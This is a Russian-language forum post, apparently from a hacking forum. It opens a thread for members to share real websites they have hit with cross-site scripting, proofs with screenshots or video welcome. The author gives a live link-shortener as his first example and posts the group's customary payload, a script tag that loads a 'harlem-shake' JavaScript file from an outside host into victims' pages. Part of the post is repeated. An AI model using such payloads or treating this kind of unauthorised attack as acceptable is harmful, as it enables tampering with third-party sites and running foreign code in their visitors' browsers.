Давно хотел создать подобную тему, есть Лента дефейсов, а это будет своего рода лентой XSS-ейсов :)
Бывает такое, что разработчики плохо фильтруют входящие данные, либо вообще этого не делают, а некоторые даже и не все места предугадывают, откуда это может прийти...
В этой теме предлагаю делится подобными проектами, где у вас получилось провести атаку, желательно со скриншотами, а лучше даже видео записать. По сложившейся вебкриминальной традиции, мы любим засовывать harlem-shake
вы тоже можете её продолжить, либо придумать что-то еще.
Приветствуются нестандартные атаки!
Начинаю. Сервис укорачиватель ссылок от xakeroker.ws -> xkrk.cf
На главной уже нету, вот остались примеры:
http://xkrk.cf/hello
http://xkrk.cf/h4x
Ну и собственно видео:
В данном случае, входящие данные вообще не фильтровались, все что отсылалось, появлялось на главной.
Бывает такое, что разработчики плохо фильтруют входящие данные, либо вообще этого не делают, а некоторые даже и не все места предугадывают, откуда это может прийти...
В этой теме предлагаю делится подобными проектами, где у вас получилось провести атаку, желательно со скриншотами, а лучше даже видео записать. По сложившейся вебкриминальной традиции, мы любим засовывать harlem-shake
Код:
<script src="http://webcriminal.ru/files/hshake.js"></script>
Приветствуются нестандартные атаки!
Начинаю. Сервис укорачиватель ссылок от xakeroker.ws -> xkrk.cf
На главной уже нету, вот остались примеры:
http://xkrk.cf/hello
http://xkrk.cf/h4x
Ну и собственно видео:
В данном случае, входящие данные вообще не фильтровались, все что отсылалось, появлялось на главной.